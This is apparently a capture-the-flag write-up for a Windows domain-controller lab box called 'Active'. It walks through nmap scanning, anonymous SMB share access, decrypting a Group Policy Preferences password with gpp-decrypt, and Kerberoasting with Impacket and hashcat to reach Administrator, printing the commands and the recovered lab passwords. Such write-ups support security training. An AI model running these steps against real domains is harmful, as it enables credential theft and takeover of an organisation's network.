Active


Contents

Intro


Pretty short box making use of SMB and Kerberoasting.

User


Mandatory nmap scan:

sudo nmap -sC -sV 10.129.5.63
Starting Nmap 7.95 ( https://nmap.org ) at 2026-05-29 12:53 EDT
Nmap scan report for 10.129.5.63
Host is up (0.0076s latency).
Not shown: 983 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-05-29 16:53:45Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC

The machine is hosting the usual services a Domain Controller would on a fairly old Windows. First thing that came to mind was scanning for SMB shares:

smbmap -H 10.129.5.63
...
[+] IP: 10.129.5.63:445	Name: 10.129.5.63         	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	NO ACCESS	Logon server share 
	Users                                             	NO ACCESS	

We get anonymous access to Replication:

smbclient //10.129.5.63/Replication -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  active.htb                          D        0  Sat Jul 21 06:37:44 2018

Inside of active.htb, there are 3 files:

DfsrPrivate                       DHS        0  Sat Jul 21 06:37:44 2018
  Policies                            D        0  Sat Jul 21 06:37:44 2018
  scripts                             D        0  Wed Jul 18 14:48:57 2018

DfsrPrivate does not have anything useful inside of it - Policies on the other hand contains a plethora of folders and files - one of which deep within piqued my interest...

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  Groups.xml                          A      533  Wed Jul 18 16:46:06 2018

Inside are two key fields inside of the /xml file: userName="active.htb\SVC_TGS", and cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" - the latter being an encrypted password. However, the AES key for Group Policy Preference Passwords has been published, and with that it can be decrypted:

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

We now have a username and password! Running smbshare with our found credentials gives us access to 3 more folders:

smbmap -H 10.129.5.63 -u SVC_TGS -p GPPstillStandingStrong2k18
...
[+] IP: 10.129.5.63:445	Name: 10.129.5.63         	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	READ ONLY	Logon server share 
	Users                                             	READ ONLY
smbclient //10.129.5.63/Users -U SVC_TGS
Password for [WORKGROUP\SVC_TGS]:
Try "help" to get a list of possible commands.
smb: \> 

Root


Given how old the OS on this machine is, I'll go with the assumption that it's subject to Kerberoasting. To test the waters, I'll use Impacket's script:

GetUserSPNs.py -dc-ip 10.129.5.63 -request active.htb/SVC_TGS
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies 

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2026-05-29 12:51:16.431344

I'm also given a *very* long hash, which I try to crack with hashcat:

hashcat -m 13100 -a 0 ticket /usr/share/wordlists/rockyou.txt --force
hashcat (v6.2.6) starting
...
:Ticketmaster1968

Note

You can actually tell which encryption to use based on the first few characters of the ticket you're given - what I got was $krb5tgs$23$*Administrator$ACTIVE.HTB$... - the $krb5tgs$23$ part tells us it's encrypted in RC4, for which there's a designated mode in hashcat.

Once we get the password, we can check with smbmap what folders we have permission to now:

smbmap -H 10.129.5.63 -u Administrator -p Ticketmaster1968
...
    [+] IP: 10.129.5.63:445	Name: 10.129.5.63         	Status: ADMIN!!!   	
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	READ, WRITE	Remote Admin
	C$                                                	READ, WRITE	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	READ, WRITE	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	READ, WRITE	Logon server share 
	Users                                             	READ ONLY	

All that's left to do is get root.txt! Very good box if you want to learn about SMB enumeration, good luck to anyone else attempting this box!